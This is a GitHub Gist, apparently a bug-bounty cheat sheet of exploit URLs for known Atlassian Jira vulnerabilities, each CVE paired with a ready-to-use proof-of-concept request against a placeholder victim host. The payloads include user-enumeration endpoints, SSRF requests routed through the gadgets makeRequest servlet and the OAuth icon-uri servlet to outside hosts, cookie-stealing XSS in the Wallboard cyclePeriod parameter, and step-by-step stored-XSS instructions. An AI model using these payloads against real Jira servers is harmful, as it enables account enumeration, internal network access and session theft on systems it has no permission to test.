Last active
March 12, 2024 09:45
-
-
Save 0x240x23elu/891371d46a1e270c7bdded0469d8e09c to your computer and use it in GitHub Desktop.
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cve-2019-8449 | |
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
https://jira.atlassian.com/browse/JRASERVER-69796 | |
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
===================================================================================================================================== | |
cve-2019-8451:ssrf-response-body | |
The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class. | |
https://jira.atlassian.com/browse/JRASERVER-69793?jql=labels%20%3D%20 | |
https://victomhost/plugins/servlet/gadgets/makeRequest?url=https://victomhost:[email protected] | |
=========================================================================================================================== | |
RCE Jira=CVE-2019–11581 | |
https://hackerone.com/reports/706841 | |
/secure/ContactAdministrators!default.jspa | |
==================================================================================== | |
===================================================================================================================================== | |
cve-2018-20824 | |
vulnerable to Server Side Request Forgery (SSRF). This allowed a XSS and or a SSRF attack to be performed. More information about the Atlassian OAuth plugin issue see https://ecosystem.atlassian.net/browse/OAUTH-344 . When running in an environment like Amazon EC2, this flaw can used to access to a metadata resource that provides access credentials and other potentially confidential information. | |
https://victomhost/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) | |
================================================================================================================================== | |
cve-2020-14179 | |
Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. | |
REF=https://jira.atlassian.com/browse/JRASERVER-71536 | |
POC: | |
https://victomhost/secure/QueryComponent!Default.jspa | |
======================================================================================================================================== | |
cve-2020-14181 | |
Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. | |
Ref=https://jira.atlassian.com/browse/JRASERVER-71560?jql=text%20~%20%22cve-2020-14181%22 | |
POC: | |
https://victomhost/secure/ViewUserHover.jspa | |
https://victomhost/ViewUserHover.jspa?username=Admin | |
===================================================================================== | |
https://hackerone.com/reports/380354 | |
CVE-2018-5230 | |
https://jira.atlassian.com/browse/JRASERVER-67289 | |
HOW TO EXPLOIT: | |
https://host/issues/?filter=-8 | |
Go to the link above | |
Click the "Updated Range:" text area | |
Put your XSS payload in "More than [ ] minutes ago" (15 character payload limit) or in "In range [ ] to [ ]" (No length limit, ONLY put the payload in the first box) | |
Click Update | |
Payload will run. If it doesn't run chances are you used double quotes somewhere. Only use single quotes! | |
=========================================================================================== | |
jira-unauthenticated-dashboards https://victomhost/rest/api/2/dashboard?maxResults=100 | |
jira-unauth-popular-filters | |
https://victomhost/secure/ManageFilters.jspa?filter=popular&filterView=popular | |
===================================================================================== | |
https://hackerone.com/reports/197726 | |
https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=popular | |
https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=search | |
===================================================================================== | |
https://hackerone.com/reports/139970 | |
https://host/secure/ConfigurePortalPages!default.jspa?view=popular | |
https://host/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false | |
===================================================================================== | |
/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm | |
=================================================================================================== | |
CVE-2019-3403 | |
Information disclosured vulnerability | |
1.()https://jira.atlassian.com/browse/JRASERVER-69242 | |
visit the URL address,you can check the user whether is exist on this host | |
/rest/api/2/user/picker?query=admin | |
So the attacker can enumerate all existing users on this jira server. | |
2.(CVE-2019-8442)https://jira.atlassian.com/browse/JRASERVER-69241 | |
visit the URL address,the server will leaking some server's information | |
/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml | |
/rest/api/2/user/picker?query=admin | |
/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml | |
============================================================= | |
CVE-2017-9506 | |
https://blog.csdn.net/caiqiiqi/article/details/89017806 | |
/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl | |
================================================================================ | |
CVE-2019-3402:[Jira]XSS in the labels gadget | |
/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search | |
ConfigurePortalPages.jspa | |
============================================================================== | |
CVE-2018-20824:[Jira]XSS in WallboardServlet through the cyclePeriod parameter | |
/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true | |
=================================================================================================================== | |
CVE-2017-9506 | |
https://ecosystem.atlassian.net/browse/OAUTH-344 | |
exploit an SSRF vulnerability in confluence and was able to perform several actions such as bypass any firewall/protection solutions, was able to perform XSPA through assessing the response times for ports, access Internal DoD Servers and internal services. | |
I discuss the vulnerabilities exploited in my write which you can find here, https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a | |
https://host/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json | |
========================================================================================= | |
https://host/secure/popups/UserPickerBrowser.jspa | |
username and email diclose |
can you please update this list for new cve ?
i will
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
excellent